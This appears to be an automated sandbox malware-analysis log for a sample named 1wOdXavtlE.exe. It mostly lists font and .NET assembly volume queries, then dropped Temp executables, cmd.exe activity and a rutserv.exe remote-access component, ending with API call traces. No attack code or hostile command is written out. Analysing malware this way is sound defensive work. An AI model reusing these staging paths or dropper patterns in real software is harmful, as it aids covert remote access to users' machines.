Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Users\user\Desktop\1wOdXavtlE.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ssevs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sssevs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ssevs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sssevs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Immunity\rutserv.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp

19_2_0060C5F8

Source: C:\Users\user\AppData\Local\Temp\servs.exe

Code function: 17_2_0041C4F8 GetLocalTime,

17_2_0041C4F8

Source: C:\Users\user\AppData\Local\Temp\servs.exe

Code function: 17_2_004A7114 GetModuleHandleW,GetVersion,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetProcessDEPPolicy,

